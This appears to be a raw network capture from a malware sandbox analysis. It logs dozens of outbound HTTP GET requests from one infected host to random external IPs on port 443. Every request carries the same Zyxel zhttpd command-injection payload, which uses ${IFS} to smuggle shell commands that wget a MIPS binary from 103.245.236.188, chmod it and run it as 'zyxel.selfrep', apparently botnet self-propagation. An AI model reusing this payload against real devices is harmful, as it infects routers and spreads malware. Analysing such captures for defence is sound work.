                                    Jan 13, 2024 19:02:28.046808004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3019192.168.2.1336434130.165.247.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046858072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3020192.168.2.1338624160.97.103.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046896935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3021192.168.2.1343170123.125.236.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.046951056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3022192.168.2.1340024203.6.232.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.047002077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3023192.168.2.1353218144.158.43.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.047061920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3024192.168.2.1332858166.191.142.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:28.047106981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3025192.168.2.135603645.104.207.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.053999901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3026192.168.2.1350374184.19.27.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054083109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3027192.168.2.1333184172.127.207.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054147959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3028192.168.2.1338896166.10.208.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054313898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3029192.168.2.134848896.95.233.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054348946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3030192.168.2.134613654.228.49.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054390907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3031192.168.2.1350110106.113.186.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054450989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3032192.168.2.1345086174.41.151.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054497004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3033192.168.2.1348116217.42.70.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054569960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3034192.168.2.133558035.165.100.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054619074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3035192.168.2.135359423.40.44.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054680109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3036192.168.2.1355624182.94.201.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054753065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3037192.168.2.1349388107.95.173.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054804087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3038192.168.2.134254832.200.251.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054848909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3039192.168.2.1336388152.254.247.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054909945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3040192.168.2.1350450114.94.243.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.054940939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3041192.168.2.135849661.179.4.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055008888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3042192.168.2.1335680185.203.141.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055083990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3043192.168.2.1340182176.238.104.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055151939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3044192.168.2.1344272217.47.193.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055211067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3045192.168.2.1333316143.182.184.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055258036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3046192.168.2.133827858.196.119.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055263042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3047192.168.2.135490666.23.21.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055342913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3048192.168.2.133928689.203.227.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055444002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3049192.168.2.135651640.248.112.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055481911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3050192.168.2.1348990141.167.42.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055529118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3051192.168.2.133862250.75.148.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055586100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3052192.168.2.1356224141.120.59.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055640936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3053192.168.2.1338530218.73.6.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055670977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3054192.168.2.133656646.173.176.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055757999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3055192.168.2.1355404205.231.156.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055816889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3056192.168.2.133494612.217.115.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055877924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3057192.168.2.1346202207.156.248.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.055953026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3058192.168.2.1336742171.149.35.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056000948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3059192.168.2.1348464177.55.208.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056065083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3060192.168.2.1337356177.115.166.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056117058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3061192.168.2.1336754147.136.214.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056184053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3062192.168.2.135085662.247.184.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056240082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3063192.168.2.134959694.134.166.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056287050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3064192.168.2.134432063.55.165.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056369066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3065192.168.2.1333732192.19.160.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056432962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3066192.168.2.135566245.89.50.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056504011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3067192.168.2.13399645.232.234.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056564093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3068192.168.2.1333018132.104.121.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056611061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3069192.168.2.133915452.240.225.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056672096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3070192.168.2.135028091.10.93.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056725979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3071192.168.2.135665243.57.249.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056782961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3072192.168.2.134633081.250.159.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056828022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3073192.168.2.134289669.50.201.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056866884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3074192.168.2.1354950170.101.205.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056905985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3075192.168.2.133956281.161.99.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.056976080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3076192.168.2.1350496211.118.26.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057022095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3077192.168.2.13604448.117.107.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057048082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3078192.168.2.1345818120.198.62.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057112932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3079192.168.2.1346600164.245.186.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057140112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3080192.168.2.1354196216.47.94.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:29.057188034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3081192.168.2.1353464128.219.58.229443
                                    TimestampBytes transferredDirectionData
